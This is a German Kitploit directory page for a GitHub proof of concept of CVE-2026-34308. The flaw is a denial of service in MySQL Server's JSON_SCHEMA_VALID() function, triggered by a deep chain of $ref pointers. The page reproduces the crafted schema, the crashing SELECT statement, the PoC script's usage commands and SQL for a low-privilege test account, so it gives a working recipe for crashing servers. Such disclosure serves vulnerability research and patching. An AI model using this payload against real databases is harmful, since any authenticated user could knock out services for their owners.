Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-34308 — # Proof-of-Concept für CVE-2026-34308, eine Denial-of-Service-Schwachstelle in der JSON-Komponente von MySQL Server Demonstriert Stack-Erschöpfung über tiefe `$ref`-Ketten in `JSON_SCHEMA_VALID()`, die einen Serverabsturz verursacht. Enthält ein Python-PoC-Skript und eine technische Analyse. | Kitploit
Tools/GitHubGitHub/joakimbulow/cve-2026-34308
SchwachstellenanalyseExploitationPenetrationstestsDatenbanksicherheit
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

# Proof-of-Concept für CVE-2026-34308, eine Denial-of-Service-Schwachstelle in der JSON-Komponente von MySQL Server Demonstriert Stack-Erschöpfung über tiefe `$ref`-Ketten in `JSON_SCHEMA_VALID()`, die einen Serverabsturz verursacht. Enthält ein Python-PoC-Skript und eine technische Analyse.

Teilen

CVE-2026-34308: MySQL Server (JSON-Komponente) Denial of Service

Offizielles Hersteller-Bulletin: Oracle Critical Patch Update Advisory — April 2026.

Zusammenfassung (aus der veröffentlichten CVE)

Sicherheitslücke in Oracle MySQL Server (Komponente: Server: JSON).

Unterstützte betroffene Versionen: 8.0.0–8.0.45, 8.4.0–8.4.8 und 9.0.0–9.6.0.

Die Sicherheitslücke ermöglicht es einem Benutzer mit niedrigen Rechten, den MySQL Server zum Absturz zu bringen.

CVSS 3.1 Basis-Score: 6.5 (nur Auswirkungen auf die Verfügbarkeit)
CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


Zusätzliche technische Analyse (nicht Teil des CVE-Texts)

Beobachteter Mechanismus: Tiefe Rekursion, während MySQL JSON_SCHEMA_VALID() gegen ein JSON-Schema auswertet, das eine lange lineare Kette von $ref-Zeigern enthält, ohne eine effektive Tiefenbegrenzung während der Schema-Kompilierung/-Validierung – was zu Stack-Erschöpfung und einem Hänger oder wiederholbarem Absturz führt.

Aufrufkette (konzeptionell):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → interne JSON-Schema-Validierung → wiederholte $ref-Auflösung
  → Stack-Erschöpfung → Hänger / Absturz

Erforderliche Berechtigungen

Für diesen PoC reicht jedes authentifizierte MySQL-Konto aus: Gewähren Sie nur USAGE auf *.* (die minimale MySQL-Berechtigung – Fähigkeit zur Verbindung – ohne SELECT, Tabellenzugriff oder Admin-Rollen). Wenn der Benutzer eine Sitzung öffnen und SELECT JSON_SCHEMA_VALID(...) ausführen kann, kann er die Bedingung auslösen.


Proof of Concept

PoC-Skript: poc_schema_dos.py

Erstellt ein JSON-Schema mit einer linearen $ref-Kette (Beispieltiefe 1200):

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

An MySQL gesendet als: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

Beim Testen gegen verwundbare Builds wurde beobachtet, dass dies den Server innerhalb von etwa einer Sekunde zum Absturz bringt (das genaue Timing hängt von Hardware, Build-Flags und Schema-Tiefe ab).

Verwendung

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

Zum Testen eines Kontos mit niedrigen Rechten:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

Dann: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (offizieller Vektor)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: Netzwerkzugriff möglich
  • AC:L: Geringe Angriffskomplexität
  • PR:L: Niedrige Berechtigungen erforderlich
  • UI:N: Keine Benutzerinteraktion
  • S:U: Unveränderter Scope
  • C:N / I:N: Keine Auswirkungen auf Vertraulichkeit oder Integrität
  • A:H: Hohe Auswirkungen auf die Verfügbarkeit (Hänger / wiederholbarer Absturz / DoS)

Dateien

  • poc_schema_dos.py: Proof-of-Concept-Skript
  • README.md: Diese Datei
Tool herunterladen